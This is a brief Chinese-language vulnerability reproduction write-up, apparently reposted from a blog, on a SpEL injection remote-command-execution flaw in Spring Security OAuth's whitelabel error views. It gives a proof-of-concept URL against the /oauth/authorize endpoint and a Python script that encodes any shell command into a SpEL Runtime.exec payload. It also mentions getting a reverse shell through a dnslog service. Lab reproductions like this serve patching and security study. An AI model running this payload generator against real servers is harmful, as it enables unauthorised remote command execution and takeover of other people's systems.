一、漏洞概述
Spring Security OAuth 是為 Spring 框架提供安全認證支持的一個模塊,在其使用 whitelabel views 來處理錯誤時,由于使用了Springs Expression Language (SpEL),攻擊者在被授權的情況下可以通過構造惡意引數來遠程執行命令,
二、漏洞復現
發現頁面如下:

poc如下:
http://your-ip:8080/oauth/authorize?response_type=[POC]&client_id=acme&scope=openid&redirect_uri=http://test
利用dnslog進行反彈shell

在以下網站進行編碼操作:
java.lang.Runtime.exec() Payload Workarounds - @Jackson_T (jackson-t.ca)

exp代碼如下,開始執行exp
#!/usr/bin/env python
message = input('Enter message to encode:')
poc = '${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)' % ord(message[0])
for ch in message[1:]:
poc += '.concat(T(java.lang.Character).toString(%s))' % ord(ch)
poc += ')}'
print(poc)

放在poc里面執行

復現成功!
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/413275.html
標籤:其他
